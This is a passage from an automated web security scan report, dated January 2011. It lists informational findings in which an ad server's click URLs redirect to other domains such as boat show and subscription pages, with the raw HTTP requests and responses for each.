The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1107774700/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1107774700/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1107774700/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.133. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1114198701/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1114198701/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1114198701/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1121605500/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1121605500/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1121605500/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.138. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:45:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1137419713/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1137419713/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1137419713/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/113792961/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/113792961/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/113792961/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

20.142. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/114076315/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/114076315/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/114076315/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1146188754/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1146188754/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1146188754/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.146. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
